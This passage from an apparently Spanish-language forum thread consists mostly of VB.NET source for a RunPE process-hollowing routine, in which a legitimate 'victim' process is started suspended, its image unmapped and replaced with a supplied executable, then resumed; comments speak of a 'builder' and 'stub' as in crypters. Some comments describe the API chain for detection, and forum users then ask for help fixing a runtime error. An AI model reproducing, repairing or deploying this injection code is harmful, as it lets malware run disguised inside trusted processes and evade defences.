ByVal lpBaseAddress As IntPtr, _
ByVal lpBuffer As IntPtr, _
ByVal iSize As Int32, _
<Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
    End Function
    <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory")> _
    Public Shared Function ReadProcessMemory(ByVal hProcess As IntPtr, _
    ByVal lpBaseAddress As Integer, _
    ByRef lpbuffer As IntPtr, _
    ByVal size As Integer, _
    ByRef lpNumberOfBytesRead As Integer) As Int32
    End Function
    <DllImport("ntdll.dll")> _
    Public Shared Function ZwUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal BaseAddress As IntPtr) As Long
    End Function

    <DllImport("kernel32.dll", SetLastError:=True, ExactSpelling:=True)> _
    Public Shared Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, _
    ByVal dwSize As UInteger, ByVal flAllocationType As UInteger, _
    ByVal flProtect As UInteger) As IntPtr
    End Function
    <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
    Public Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UIntPtr, ByVal flNewProtect As UIntPtr, <Out()> ByVal lpflOldProtect As UInteger) As Integer
    End Function

    ' File / mapping / resource constants. Of these, only PAGE_READONLY is referenced by the
    ' code visible in this listing (in Protect).
    Const GENERIC_READ As Int32 = &H80000000
    Const FILE_SHARE_READ As UInt32 = &H1
    Const OPEN_EXISTING As UInt32 = 3
    Const FILE_ATTRIBUTE_NORMAL As UInt32 = &H80
    Const INVALID_HANDLE_VALUE As Int32 = -1
    Const PAGE_READONLY As UInt32 = &H2
    Const FILE_MAP_READ As UInt32 = &H4
    Const IMAGE_DOS_SIGNATURE As UInt16 = &H5A4D
    Const RT_VERSION As Int32 = 16

    ' Executable-format signatures; SRexec compares against the DOS and NT values.
    Private Enum ImageSignatureTypes
        IMAGE_DOS_SIGNATURE = &H5A4D     ''\\ MZ
        IMAGE_OS2_SIGNATURE = &H454E     ''\\ NE
        IMAGE_OS2_SIGNATURE_LE = &H454C  ''\\ LE
        IMAGE_VXD_SIGNATURE = &H454C     ''\\ LE
        IMAGE_NT_SIGNATURE = &H4550      ''\\ PE00
    End Enum

    ' Entry point of this variant: starts sVictim suspended and replaces its image with the PE
    ' held in b.
    '   b       - raw bytes of the PE file to load.
    '   sVictim - command line passed to CreateProcess for the host process.
    ' Returns nothing; every failure is a silent Exit Sub or a skipped If block.
    ' API sequence visible below, in order (the behavioural chain to detect):
    '   CreateProcess(&H4 = CREATE_SUSPENDED) -> GetThreadContext -> ReadProcessMemory(Ebx + 8)
    '   -> ZwUnmapViewOfSection -> VirtualAllocEx(PAGE_READWRITE) -> WriteProcessMemory
    '   (headers, then each section) -> VirtualProtectEx per section -> WriteProcessMemory
    '   (Ebx + 8) -> SetThreadContext (Eax changed) -> ResumeThread.
    ' Analyst notes:
    '  - The remote allocation is read-write and sections are re-protected afterwards, so a rule
    '    that looks only for read-write-execute remote allocations would not match this listing;
    '    key on the unmap / remote write / SetThreadContext chain instead.
    '  - The signature check runs after CreateProcess, so an input that fails it leaves the
    '    host process behind in the suspended state.
    Public Shared Sub SRexec(ByVal b() As Byte, ByVal sVictim As String)
        Dim sVersion As [String] = Nothing
        Dim pidh As IMAGE_DOS_HEADER
        Dim context As CONTEXT = New CONTEXT()

        Dim Pinh As IMAGE_NT_HEADERS
        Dim Pish As IMAGE_SECTION_HEADER

        Dim pi As PROCESS_INFORMATION = New PROCESS_INFORMATION()
        Dim si As STARTUPINFO = New STARTUPINFO()

        Dim pSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()
        Dim tSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()

        'converts a data type in another type.
        'since .net types are different from types handle by winAPI,  DirectCall a API will cause a type mismatch, since .net types
        ' structure is completely different, using different resources.
        ' Pin the byte array, keep its address as a 32-bit integer, and marshal the DOS header
        ' out of it.
        Dim MyGC As GCHandle = GCHandle.Alloc(b, GCHandleType.Pinned)
        Dim ptbuffer As Integer = MyGC.AddrOfPinnedObject.ToInt32
        pidh = Marshal.PtrToStructure(MyGC.AddrOfPinnedObject, pidh.GetType)
        MyGC.Free()

        ' &H4 is CREATE_SUSPENDED: the host process is created but its thread does not run.
        If CreateProcess(Nothing, sVictim, pSec, tSec, False, &H4, Nothing, Nothing, si, pi) = 0 Then
            Exit Sub
        End If

        ' NT headers are located through e_lfanew from the DOS header.
        Dim vt As Integer = ptbuffer + pidh.e_lfanew
        Pinh = Marshal.PtrToStructure(New IntPtr(vt), Pinh.GetType)

        Dim addr As Long, lOffset As Long, ret As UInteger
        si.cb = Len(si)
        context.ContextFlags = CONTEXT86_INTEGER
       
        'all "IF" are only for better understanding, you could do all verification on the builder and then the rest on the stub
        ' Reject input whose NT signature or DOS magic does not match.
        If Pinh.Signature <> ImageSignatureTypes.IMAGE_NT_SIGNATURE Or pidh.e_magic <> ImageSignatureTypes.IMAGE_DOS_SIGNATURE Then Exit Sub
        ' Read the host's image base from Ebx + 8 and unmap that image from the host process.
        If GetThreadContext(pi.hThread, context) And _
            ReadProcessMemory(pi.hProcess, context.Ebx + 8, addr, 4, 0) >= 0 And _
            ZwUnmapViewOfSection(pi.hProcess, addr) >= 0 Then

            ' Allocate SizeOfImage bytes at the payload's preferred ImageBase, read-write.
            Dim ImageBase As UInt32 = VirtualAllocEx(pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
            If ImageBase <> 0 Then
                ' Remote write of the PE headers.
                WriteProcessMemory(pi.hProcess, ImageBase, b, Pinh.OptionalHeader.SizeOfHeaders, ret)

                ' Section headers start 248 bytes after the NT headers and are read 40 bytes apart.
                lOffset = pidh.e_lfanew + 248
                For i As Integer = 0 To Pinh.FileHeader.NumberOfSections - 1
                'math changes, anyone with pe understanding know
                    Pish = Marshal.PtrToStructure(New IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType)
                    Dim braw(Pish.SizeOfRawData) As Byte
                    'more math for reading only the section.  mm API has a "shortcut" when you pass a specified startpoint.
                    '.net can't use so you have to make a new array
                    For j As Integer = 0 To Pish.SizeOfRawData - 1
                        braw(j) = b(Pish.PointerToRawData + j)
                    Next
                    ' Remote write of the section, then set its page protection from the
                    ' section characteristics (see Protect).
                    WriteProcessMemory(pi.hProcess, ImageBase + Pish.VirtualAddress, braw, Pish.SizeOfRawData, ret)
                    VirtualProtectEx(pi.hProcess, ImageBase + Pish.VirtualAddress, Pish.Misc.VirtualSize, Protect(Pish.Characteristics), addr)
                Next i
                Dim bb As Byte() = BitConverter.GetBytes(ImageBase)

                ' Write the new image base back to Ebx + 8, point Eax at the new entry point,
                ' apply the context and resume the thread.
                WriteProcessMemory(pi.hProcess, context.Ebx + 8, bb, 4, ret)
                context.Eax = ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
                Call SetThreadContext(pi.hThread, context)
                Call ResumeThread(pi.hThread)
            End If
        End If
    End Sub

    ' Maps a section's Characteristics value to a page-protection constant: the value is
    ' shifted right by 29 bits, leaving the top three flag bits as an index (0..7) into the
    ' table below.
    Private Shared Function Protect(ByVal characteristics As Long) As Long
        Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
                        PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
                        PAGE_READWRITE, PAGE_EXECUTE_READWRITE}

        Protect = mapping(RShift(characteristics, 29))
    End Function
   
    ' Right shift implemented as a floating-point division by 2 ^ lNumberOfBitsToShift; the
    ' result is converted back to Long by the implicit assignment conversion.
    Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
        RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
    End Function
    ' Returns Value as a Double, adding 2^32 (4294967296) when Value is negative.
    Private Shared Function vbLongToULong(ByVal Value As Long) As Double
        Const OFFSET_4 = 4294967296.0#
        If Value < 0 Then
            vbLongToULong = Value + OFFSET_4
        Else
            vbLongToULong = Value
        End If
    End Function
   
End Class

Cromatico

Ya lo habia probado tambien pero nop, ejecuto y me tira:

---------------------------
Error irrecuperable
---------------------------
Error CLR: 80004005.
El programa terminará ahora.
---------------------------
Aceptar   
---------------------------

¿Será que hay que compilarlo de alguna forma en particular? ¿Lo probaste vos?

Gracias!

_katze_

voy a buscar y corregir eso a ver q sale

Cromatico

Dale muchas gracias maestro, espero tu respuesta :) Saludos

Cromatico

Alguien tiene alguna novedad sobre este tema??

Saludos y gracias!